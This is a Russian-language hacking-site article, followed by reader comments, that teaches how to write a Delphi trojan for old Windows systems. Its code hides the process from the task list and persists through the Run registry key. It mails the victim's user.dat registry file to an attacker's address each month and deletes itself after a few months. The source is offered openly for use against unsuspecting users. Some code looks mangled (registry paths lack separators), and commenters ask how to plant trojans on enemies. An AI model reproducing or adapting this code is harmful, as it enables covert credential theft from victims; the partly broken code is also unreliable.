Троян — HackZona.Ru

Троян

Троян

Тип статьи:
Со старой ХакЗоны.
Трояны, трояны, трояны… писать их на самом деле довольно просто, если, конечно, знать точно, что писать :-). Поэтому сначала нужно разработать концепцию, схему, план действий, по которому будет действовать троян и тот, кто им воспользуется :-). Напишем простенький троянчик, который при попадании на компьютер поселится в виде баггла (в шотландском народном фольклоре — это маленькое существо, помогающее человеку по дому, то есть что-то вроде нашего домового) и будет, например, каждый месяц исправно посылать емыльной почтой файл user.dat. (реализацию для %user%.pwl я оставляю на рассмотрение читателю — переделать/дописать будет несложно). Пусть, для определенности и нашего спокойствия, он тихо и незаметно удалится с машины несчастного LMD, скажем, через пару-тройку месяцев работы (то есть пары-тройки «рассылок почты») :-).

Писать я буду на Delphi, так как это практически самый простой и доступный язык для начинающего кодера. Да и для простого человека, имеющего достаточный опыт работы с компом, все здесь будет довольно прозрачно для понимания.

Схватки, бред, потеря сознания

Первым делом… нет, не самолеты :-). Первым делом прибить все окна свежесозданного (с помощью File|New Application) проекта в Delphi, включая главную форму. Проект прибивать не нужно :-). Чтобы поглядеть, что еще осталось, можно ткнуть «серым существом с длинным хвостом» в View|Project Source. Приблизительно это будет выглядеть так:


program Project1;

uses

Forms;

{$R *.RES}

begin

Application.Initialize;

Application.Run;

end.


Все, что касается Application, можно удалить — троян должен вести себя тихо, а потому всякие всплывающие окна и кнопки в панели задач нам не нужны. Нужно удалить также и строчку {$R *.RES}, чтобы не тянуть с собой ненужные иконки и прочую лабуду, так усердно навешиваемую Дельфей. Forms тоже удаляем, поскольку форм у нас не осталось :-). Но (!) нужно будет подключить пару-тройку других модулей, которые действительно будут задействованы:


uses

Windows, // здесь описаны почти все документированные сообщения и

// библиотечные функции виндовза

Registry, // это модуль для работы с системным реестром

Mapi, // а это — чтобы отправлять и принимать сообщения по почте

// и не только. Но нас интересует только отправка ;-)

SysUtils; // вспомогательная библиотека — полезные функции для работы

// со строками и датой/временем.


Появилась головка

Прежде чем приступить собственно к созданию рассылки :-), нужно убедиться, что все будет происходить совершенно незаметно. Естественно, что мигание лампочек на панели модема не спрячешь, но в остальном все можно провернуть без шума и пыли. В панели задач троян не засветится, потому что у него нет главного окна и, соответственно, некуда переключать фокус. А вот по ctrl+alt+del, то есть в списке всех задач, он будет светиться — да еще как! Но эту проблему можно решить просто — достаточно прикинуться невинным скринсавером, чтобы виндовза не показывала его в этом списке. Для этого необходимо воспользоваться специальной функцией RegisterServiceProcess. К сожалению, эту функцию не описывают в стандартных модулях Delphi, поэтому придется описать ее самостоятельно и создать соответствующую процедуру вызова:

procedure RegisterServiceProcess; external 'kernel32.dll' name 'RegisterServiceProcess';

procedure Hide; assembler;

asm

push 1

push 0

call RegisterServiceProcess;

end;


Вышел. Живой. Подал голос.

Представим себе, что троян уже на машине бедного несчастного (людям со слабой нервной системой дальше не читать) ;-) ламера. Первым делом он его запускает (а он, например, что-нибудь в ответ показывает или делает вид, что он — новый супер-пупер апгрейд к офису-2000) и… а дальше троян должен что-то предпринять, чтобы он запускался после каждой перезагрузки машины. Можно, конечно, добавить трояна в папку Автозагрузка, но это ж сразу в глаза бросится — и конечно, есть способ лучше! На наше счастье, программисты виндовзы спроектировали систему очень удобно с точки зрения троянописателей — в системном реестре существуют специальные разделы, посвященные спискам программ, которые должны запускать до старта основных модулей системы, после них и вместо них.

Воспользуемся объектом TRegistry для этих целей:


Reg:=TRegistry.Create;

with Reg do

begin

if OpenKey('SOFTWAREMicrosoftWindowsCurrentVersionRun', True) then

begin

Str:=ReadString('ExplorerService');

if Str <> ParamStr(0) then WriteString('ExplorerService', ParamStr(0));

CloseKey;

OpenKey('SOFTWAREmmuser', True);

try

if StrToDate(ReadString('DateResolve')) > Now then

begin

Send:=True;

WriteString('DateResolve', DateToStr(Now+30));

end

else

Send:=False;

if StrToDate(ReadString('DateExpiration')) <= Now then

Xapakipi:=True

else

Xapakipi:=False;

except

WriteString('DateResolve', DateToStr(Now));

WriteString('DateExpiration', DateToStr(Now+121));

end;

CloseKey;

end;


Из листинга видно, что для запуска себя после рестарта виндовза достаточно прописать путь к себе, любимому, в HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun. В него прописываем ключ с произвольным именем и содержанием = «путь_к_трояну». Попутно в первый раз дописываем свои параметры DateResolve, чтобы в следующий раз знать, когда нужно отсылать файлы.

Кроме DateResolve запишем и DateExpiration — дату, после которой нужно будет просто вырубиться, прибив свою тушку перед этим. Но как это сделать, если виндовз не дает доступа (удалять и перезаписывать) к файлу, из которого запущен? Можно сильно извращаться с разными параметрами или создавать BATники, но в данном случае гораздо проще сделать так:
if Xapakipi then

begin

RootKey:=HKEY_LOCAL_MACHINE;

OpenKey('SOFTWAREMicrosoftWindowsCurrentVersionRunOnce', True);

WriteString('LMD', 'del "'+ParamStr(0)+'"');

Send:=False;

end;

end;

Reg.Free;


То есть просто прописать удаление собственного файла в RunOnce — после выполнения строчка будет удалена системой автоматически. И все — юзер может даже и не узнать никогда, почему у него оказалось на пару-тройку часиков Инета меньше, чем положено.

Чтобы лишний раз не светиться (юзер умный нынче пошел :-P), можно быстренько закругляться, если ничего посылать не нужно:


if not Send then Exit;


Папаша, принимайте дитё!

Настала очередь и для отсылки user.dat. Первым делом его надо найти — я не шучу. Не у всех юзеров виндовза поставлена в C:WINDOWS. Некоторые выпендриваются и ставят ось, например, в какой-нибудь F:MUSTDIE). Но это уже непосредственно после того, как получим доступ к почтовым службам. Поэтому сначала определимся: есть ли доступ? Для этого служит функция из Win32API MAPILogon. Если все в порядке, она возвращает ноль. И тогда наступает время генерировать почтовое сообщение и аттачить к нему филе. Подробнее об этом можно почитать в любой книжке по Win32 API. Скажу лишь, что для создания сообщения требуется заполнить структуру MAPIMessage и соответствующие подструктуры MAPIRecipDesc (получатели) и MAPIFileDesc (аттачи). Как видно из исходника, адрес получателя указывается в lpRecips->lpszAddress.


repeat

if MAPILogon(0, nil, nil, 0, 0, @Handle) = 0 then

try

ZeroMemory(@Msg, sizeof(Msg));

with Msg do

begin

lpszNoteText:='message delivery. notification system v.01 |';

lpszSubject:=nil;

nRecipCount:=1;

GetMem(lpRecips, sizeof(TMapiRecipDesc));

ZeroMemory(lpRecips, sizeof(TMapiRecipDesc));

with lpRecips^ do

begin

ulRecipClass:=MAPI_TO;

lpszName:='Xakep';

lpszAddress:='SMTP:[email protected]';

end;

nFileCount:=1;

GetMem(lpFiles, sizeof(TMapiFileDesc));

ZeroMemory(lpFiles, sizeof(TMapiFileDesc));

with lpFiles^ do

begin

GetMem(lpszPathName, 144);

GetWindowsDirectory(lpszPathName, 144);

StrCat(lpszPathName, 'user.dat');

nPosition:=StrLen(lpszNoteText)-4;

end;

MAPISendMail(Handle, 0, Msg, 0, 0);

FreeMem(lpRecips, sizeof(TMapiRecipDesc));

FreeMem(lpFiles^.lpszPathName, 144);

FreeMem(lpFiles, sizeof(TMapiFileDesc));

end;

finally

MAPILogoff(Handle, 0, 0, 0);

Exit;

end;

Sleep(3*60*1000);

until False;


Все. Осталось дожидаться пока юзер прилогинится к своему провайдеру и зайдет в Сеть. Sleep(3*60*1000) — ждем три минуты и потом пытаемся постучаться в дверь снова — не стоит перегружать компьютер ненужной работой, а то сразу станет заметно присутствие посторонних. После того как сообщение отослано, троян быстренько сворачивает свою бурную деятельность. В-)

Вперед, сыны Трои! Дерзайте! В-)
Нравится
Не нравится

11 комментариев

07:56
мне не понятно!!а как прописать путь к себе!!чтобы троян скидывал пароли мне на почту???
00:50
Бред. В коде куча ошибок!
01:06
подскажите как закинуть троян к врагу и управлять им ?
01:17
народ так по этому сообщению действительно можно троян написать или это ахинея безграмотная???
01:17
народ так по этому сообщению действительно можно троян написать или это ахинея безграмотная???
03:10
даже в ВБ можно сделать процесс невидимым без АПИ: app.taskvisible=false
09:28
А как удалить такой троян?похоже кто то из ваших меня атаковал
22:25
ia ne ponil on sam otpravleaet pisma na meil?
esli de ,gde v scripte adres imeila?
22:26
помоему ето бред сумасшедшего (это я говорю ка программист).
с делфи я канечно не очень дружу но даже для автозапуска не проще ли прописаться в Autoexec.bat, да аще где тама мыльце указывается куда слать то?
23:56
БЛИН ЯЯЯ ВСЁЁЁЁ ТАК СОБИРАЮ А ЧТО МНЕ ОТЧЁТЫ НЕ ПРИХОДЯТТТТТ ПОМОГИТЕЕ ПОЖАЛУСТААААААААААА
23:57
КТО ЗНАЕТ КАК РАБОТАТЬ ПИНЧЕМ ПОМОГИТЕЕЕЕЕЕ ПОЖАЛУСТА РЕБЯТАААА ЕСЛИ ЧЁ ПИШИТЕ В АСЮ